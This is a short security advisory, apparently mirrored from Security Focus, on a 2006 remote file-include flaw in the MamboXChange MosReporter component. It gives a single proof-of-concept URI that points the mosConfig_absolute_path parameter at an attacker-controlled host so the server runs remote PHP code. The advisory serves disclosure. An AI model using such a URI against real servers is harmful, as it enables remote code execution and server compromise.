MosReporter Component Remote File Include Vulnerability
TITLE: MosReporter Component Remote File Include Vulnerability
CLASS: Input Validation Error
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Nov 17 2006 12:00AM
UPDATE: Nov 17 2006 12:00AM
CREDIT: Crackers_Child is credited with the discovery of this vulnerability.
VULNERABLE:
MamboXChange MosReporter 1.0NOT VULNERABLE:
Vai alla pagina originale su Security Focus
Discussion
The MosReporter component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
Exploit
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://attacker's site
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.
References
References:
- MosReporter Home Page (MamboXchange)
- MosReporter Joomla Component Remote File Inclusion Exploi (crackers_child@sibersavascilar.com)